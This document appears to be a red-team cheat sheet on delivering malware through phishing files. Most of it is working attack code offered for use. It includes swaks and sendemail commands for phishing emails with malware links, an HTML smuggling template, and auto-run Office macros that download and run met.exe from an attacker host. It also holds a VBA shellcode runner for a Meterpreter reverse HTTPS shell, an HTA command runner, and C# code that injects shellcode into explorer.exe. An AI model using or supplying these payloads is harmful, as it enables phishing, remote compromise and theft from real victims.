Malicious Phishing Files

This section contains several ways to infect a victim by sending a malicious file.

Sending emails

In case you are performing spear phishing, you can use the following commands to send the phishing email.

swaks -t <VICTIM_EMAIL> -f <YOUR_FAKE_EMAIL> --server <SMTP_EMAIL> --body 'click me http://<YOUR_IP>/<MALWARE>' --header "Subject: Important" --add-header "Really: 1.0" --add-header "Content-Type: text/html"  [--attach <ATTACHED_FILE>]

sendemail -t <VICTIM_EMAIL> -f <YOUR_FAKE_EMAIL> -s <SMTP_EMAIL> -m "click me http://<YOUR_IP>/<MALWARE>" -u "Important!!!" [-a <ATTACHED_FILE>]

HTML Smuggling

This technique consists of attackers embedding malicious files into HTML or JavaScript code within seemingly harmless files or documents. In this case, the attacker will base64 encode its malicious file and add it into an HTML file. Then, once the victim accesses the HTML file, the malicious file will be downloaded into the machine, but it won't be executed unless the attacker tricks the victim into doing so.

<html>
    <body>
        <script>
            function base64ToArrayBuffer(base64) {
                var binary_string = window.atob(base64);
                var len = binary_string.length;
                var bytes = new Uint8Array(len);
                for (var i = 0; i < len; i++) {
                    bytes[i] = binary_string.charCodeAt(i);
                }
                return bytes.buffer;
            }
            
            var fileName = '<MALICIOUS_FILE_NAME>';
            <!-- base64 -w 0 <FILE.EXE> -->
            var file = '<B64_ENCODED_FILE>';
            var data = base64ToArrayBuffer(file);
            var blob = new Blob([data], {
                type: 'octet/stream'
            });
            
            
            if (window.navigator.msSaveOrOpenBlob) {
                window.navigator.msSaveOrOpenBlob(blob, fileName);
            } else {
                var a = document.createElement('a');
                document.body.appendChild(a);
                a.style = 'display: none';
                var url = window.URL.createObjectURL(blob);
                a.href = url;
                a.download = fileName;
                a.click();
                window.URL.revokeObjectURL(url);
            }
        </script>
    </body> 
</html>

Office

Thanks to Microsoft Office document macros, they can be used to infect the victim's computer in several ways.

File Dropper

Waits two seconds (Wait (2)) for the file to be downloaded and then it is executed.

Sub Document_Open()
    MyMacro
End Sub
Sub AutoOpen()
    MyMacro
End Sub

Sub Wait(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub

Sub MyMacro()
    If ActiveDocument.Name <> "runner.doc" Then
		Exit Sub
    End If
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://<YOUR_IP>/met.exe','met.exe')"
    Shell str, vbHide
    Dim exePath As String
    exePath = ActiveDocument.path + "\met.exe"
    Wait (2)
    Shell exePath, vbHide
End Sub

Win32Runner

The following macro allocates the Metasploit's assembly code into memory and then executes it. However, there is a caveat because if the victim closes Office the reverse shell will be closed, so you need to migrate the reverse shell to another process.

#If VBA7 Then
    Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As LongPtr, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
    Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As LongPtr, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As LongPtr) As LongPtr
#Else
    Private Declare Function CreateThread Lib "KERNEL32" Alias "CreateThread" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As Long, ThreadParameter As Long, ByVal CreateFlags As Long, ByRef ThreadId As Long) As Long
    Private Declare Function VirtualAlloc Lib "KERNEL32" Alias "VirtualAlloc" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function RtlMoveMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal lDestination As Long, ByRef sSource As Any, ByVal lLength As Long) As Long
#End If

Sub Document_Open()
    MyMacro
End Sub
Sub AutoOpen()
    MyMacro
End Sub

Function MyMacro()
  Dim buf As Variant
  Dim addr As LongPtr
  Dim counter As Long
  Dim data As Long
  If ActiveDocument.Name <> "runner.doc" Then
	Exit Function
  End If

' msfconsole -x "use multi/handler; set payload windows/meterpreter/reverse_https; setg LHOST 0.0.0.0; setg EXITFUNC thread; set LPORT 443; set AutoRunScript 'migrate -n explorer.exe'; exploit -j"
' msfvenom -p windows/meterpreter/reverse_https LHOST=<YOUR_IP> LPORT=443 EXITFUNC=thread -f powershell -v buf | tr -d '\n' |  xclip -sel clipboard
  buf = Array(<MSFVENOM_PAYLOAD>)

  addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
  For counter = LBound(buf) To UBound(buf)
    data = buf(counter)
    res = RtlMoveMemory(addr + counter, data, 1)
  Next counter

  res = CreateThread(0, 0, addr, 0, 0, 0)
End Function

Win32Runner - BadAssMacros (Tool)

The BadAsssMacros is a tool used to generate malicious macros leveraging techniques like VBA Purging and Shellcode Obfuscation to evade AV engines. Nonetheless, it only works on x86 office. For x64 instances, you need to change the generated as stated in the repository.

HTA

A .hta (HTML Application) file is a type of file format used in Windows to create applications with an HTML and scripting language-based user interface. .hta files are executed using the Microsoft HTML Application Host (mshta.exe) rather than a web browser. They allow developers to create standalone applications that can have a graphical user interface (GUI) using HTML, CSS, and JavaScript.

Thus, based on the previous information, you can create your own .hta that will run your malicious code.

<html>
<head>
	<script language="JScript">
		var shell = new ActiveXObject("WScript.Shell");
		var res = shell.Run('<YOUR_MALICIOUS_COMMAND>');
	</script>
</head>
<body>
	<script language="JScript">
		self.close();
	</script>
</body>
</html>

HTA - DotNetToJScript

The DotNetToJScript tool generates a JScript which bootstraps an arbitrary .NET Assembly and class.

Modify ExampleAssembly.cs to obtain a reverse shell with Metasploit and compile the project.

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;

[ComVisible(true)]
public class TestClass
{
    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);

    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll")]
    static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);

    [DllImport("kernel32.dll")]
    static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
    public TestClass()
    {
        // Obtain explorer.exe handle
        IntPtr hProcess = OpenProcess(0x001F0FFF, false, Process.GetProcessesByName("explorer")[0].Id);

        // Allocate memory on explorer.exe
        IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);

        // msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<YOUR_IP> LPORT=443 EXITFUNC=thread -f csharp -v buf
        // msfconsole -x "use multi/handler; set payload windows/x64/meterpreter/reverse_https; setg LHOST 0.0.0.0; setg EXITFUNC thread; set LPORT 443; exploit"
        byte[] buf = <MSFVENOM_PAYLOAD>


        int size = buf.Length;
        IntPtr outSize;
        // Write msfvenom payload into explorer memory
        WriteProcessMemory(hProcess, addr, buf, buf.Length, out outSize);
        // Execute the just copied code
        IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
    }

    public void RunProcess(string path)
    {
        Process.Start(path);
    }
}

Encode the ExampleAssembly.dll into JScript.

cd DotNetToJScript-master\
.\DotNetToJScript\bin\Debug\DotNetToJScript.exe .\ExampleAssembly\bin\Debug\ExampleAssembly.dll --lang=Jscript --ver=v4 -o demo.js
notepad demo.js

Add the output of demo.js into runner.hta.

<html>
<head>
	<script language="JScript">
		<DEMO.JS>
	</script>
</head>
<body>
	<script language="JScript">
		self.close();
	</script>
</body>
</html>

Last updated 9 months ago